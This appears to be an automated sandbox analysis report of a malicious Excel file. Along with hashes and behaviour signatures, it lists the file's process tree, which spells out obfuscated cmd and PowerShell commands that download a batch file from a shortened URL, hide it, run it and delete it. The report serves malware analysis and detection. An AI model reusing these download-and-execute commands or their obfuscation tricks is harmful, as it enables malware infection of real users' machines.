Analysis
-
max time kernel
117s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20240729-en -
resource tags
arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system -
submitted
25/03/2025, 06:14
Behavioral task
behavioral1
Sample
d8032c71de22af1a399435b344ca825689ee175529c98fce2529f128f8357dc2.xls
Resource
win7-20240729-en
Behavioral task
behavioral2
Sample
d8032c71de22af1a399435b344ca825689ee175529c98fce2529f128f8357dc2.xls
Resource
win10v2004-20250314-en
General
-
Target
d8032c71de22af1a399435b344ca825689ee175529c98fce2529f128f8357dc2.xls
-
Size
67KB
-
MD5
85a5ea8dcd78a8df15d7e49bb5f22387
-
SHA1
4f3765768183cbf79e220df9a15ca778c2385b64
-
SHA256
d8032c71de22af1a399435b344ca825689ee175529c98fce2529f128f8357dc2
-
SHA512
ccf1a3c0a39aec76d3da09085b5f3e98dc2540545109a7654bba41f4d2c9bfc03edfe37c3a3ce1276f9795fd5f5c7ae476fb9e58e0b386b8f75ea6f59ba785a5
-
SSDEEP
1536:+MnSGiysRchNXHfA1MiWhZFGkEld+Dr7JmSb4wIE7zp0RhBv1hQz7rT01aG:+MnSGiysRchNXHfA1MiWhZFGkEld+Dri
Malware Config
Extracted
https://tinyurl.com/y677kmz8
Signatures
-
Process spawned unexpected child process 5 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process 2732 2680 cmd.exe 29 Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process 2972 2680 cmd.exe 29 Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process 2668 2680 cmd.exe 29 Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process 2832 2680 cmd.exe 29 Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process 2588 2680 cmd.exe 29 -
Blocklisted process makes network request 2 IoCs
flow pid Process 5 2616 powershell.exe 6 2616 powershell.exe -
Sets file to hidden 1 TTPs 1 IoCs
Modifies file attributes to stop it showing in Explorer etc.
pid Process 444 attrib.exe -
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
-
System Location Discovery: System Language Discovery 1 TTPs 12 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language EXCEL.EXE -
Enumerates system info in registry 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 2680 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 5 IoCs
pid Process 3064 powershell.exe 2564 powershell.exe 2628 powershell.exe 2572 powershell.exe 2616 powershell.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
description pid Process Token: SeDebugPrivilege 3064 powershell.exe Token: SeDebugPrivilege 2572 powershell.exe Token: SeDebugPrivilege 2628 powershell.exe Token: SeDebugPrivilege 2564 powershell.exe Token: SeDebugPrivilege 2616 powershell.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
pid Process 2680 EXCEL.EXE 2680 EXCEL.EXE 2680 EXCEL.EXE -
Suspicious use of WriteProcessMemory 44 IoCs
description pid Process procid_target PID 2680 wrote to memory of 2732 2680 EXCEL.EXE 30 PID 2680 wrote to memory of 2732 2680 EXCEL.EXE 30 PID 2680 wrote to memory of 2732 2680 EXCEL.EXE 30 PID 2680 wrote to memory of 2732 2680 EXCEL.EXE 30 PID 2680 wrote to memory of 2972 2680 EXCEL.EXE 31 PID 2680 wrote to memory of 2972 2680 EXCEL.EXE 31 PID 2680 wrote to memory of 2972 2680 EXCEL.EXE 31 PID 2680 wrote to memory of 2972 2680 EXCEL.EXE 31 PID 2680 wrote to memory of 2668 2680 EXCEL.EXE 32 PID 2680 wrote to memory of 2668 2680 EXCEL.EXE 32 PID 2680 wrote to memory of 2668 2680 EXCEL.EXE 32 PID 2680 wrote to memory of 2668 2680 EXCEL.EXE 32 PID 2680 wrote to memory of 2832 2680 EXCEL.EXE 33 PID 2680 wrote to memory of 2832 2680 EXCEL.EXE 33 PID 2680 wrote to memory of 2832 2680 EXCEL.EXE 33 PID 2680 wrote to memory of 2832 2680 EXCEL.EXE 33 PID 2680 wrote to memory of 2588 2680 EXCEL.EXE 34 PID 2680 wrote to memory of 2588 2680 EXCEL.EXE 34 PID 2680 wrote to memory of 2588 2680 EXCEL.EXE 34 PID 2680 wrote to memory of 2588 2680 EXCEL.EXE 34 PID 2732 wrote to memory of 2564 2732 cmd.exe 40 PID 2732 wrote to memory of 2564 2732 cmd.exe 40 PID 2732 wrote to memory of 2564 2732 cmd.exe 40 PID 2732 wrote to memory of 2564 2732 cmd.exe 40 PID 2972 wrote to memory of 2572 2972 cmd.exe 41 PID 2972 wrote to memory of 2572 2972 cmd.exe 41 PID 2972 wrote to memory of 2572 2972 cmd.exe 41 PID 2972 wrote to memory of 2572 2972 cmd.exe 41 PID 2588 wrote to memory of 2616 2588 cmd.exe 42 PID 2588 wrote to memory of 2616 2588 cmd.exe 42 PID 2588 wrote to memory of 2616 2588 cmd.exe 42 PID 2588 wrote to memory of 2616 2588 cmd.exe 42 PID 2668 wrote to memory of 2628 2668 cmd.exe 43 PID 2668 wrote to memory of 2628 2668 cmd.exe 43 PID 2668 wrote to memory of 2628 2668 cmd.exe 43 PID 2668 wrote to memory of 2628 2668 cmd.exe 43 PID 2832 wrote to memory of 3064 2832 cmd.exe 44 PID 2832 wrote to memory of 3064 2832 cmd.exe 44 PID 2832 wrote to memory of 3064 2832 cmd.exe 44 PID 2832 wrote to memory of 3064 2832 cmd.exe 44 PID 2628 wrote to memory of 444 2628 powershell.exe 45 PID 2628 wrote to memory of 444 2628 powershell.exe 45 PID 2628 wrote to memory of 444 2628 powershell.exe 45 PID 2628 wrote to memory of 444 2628 powershell.exe 45 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 444 attrib.exe
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\d8032c71de22af1a399435b344ca825689ee175529c98fce2529f128f8357dc2.xls1⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2680 -
C:\Windows\SysWOW64\cmd.execmd /k p^owershel^l -w 1 stARt`-slE`Ep 3; Move-Item "pd.bat" -Destination "$e`nV:T`EMP"2⤵
- Process spawned unexpected child process
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2732 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -w 1 stARt`-slE`Ep 3; Move-Item "pd.bat" -Destination "$e`nV:T`EMP"3⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2564
-
-
-
C:\Windows\SysWOW64\cmd.execmd /k p^owershel^l -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force2⤵
- Process spawned unexpected child process
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2972 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force3⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2572
-
-
-
C:\Windows\SysWOW64\cmd.execmd /k p^owershel^l -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat2⤵
- Process spawned unexpected child process
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2668 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat3⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2628 -
C:\Windows\SysWOW64\attrib.exe"C:\Windows\system32\attrib.exe" +s +h pd.bat4⤵
- Sets file to hidden
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:444
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /k p^owershel^l -w 1 stARt`-slE`Ep 7;cd "$e`nV:T`EMP; ./pd.bat"2⤵
- Process spawned unexpected child process
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2832 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -w 1 stARt`-slE`Ep 7;cd "$e`nV:T`EMP; ./pd.bat"3⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3064
-
-
-
C:\Windows\SysWOW64\cmd.execmd /k powershel^l -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile')."Invoke"('https://tinyurl.com/y677kmz8','pd.bat')2⤵
- Process spawned unexpected child process
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2588 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile')."Invoke"('https://tinyurl.com/y677kmz8','pd.bat')3⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2616
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\JPHZ3SLVHLUG7LZW46FG.temp
Filesize7KB
MD54c4ecc15911e2bfee61bbee9c0265f3d
SHA1a32f1a8cc36c83c7378e3ce8897c273ce1e2f9b6
SHA25613d227b6a75f80829c5c99f3dff2e86709d2bf15c3bc52d5a9259ca7b3848108
SHA5121986fd800b6e90ebcaf0e18fbc86a4951b15dff04c8cc0bc01771efcd2d0a8597e2356629c426e825f8807c72412e10ff9346429e255a636b320462ac70daac7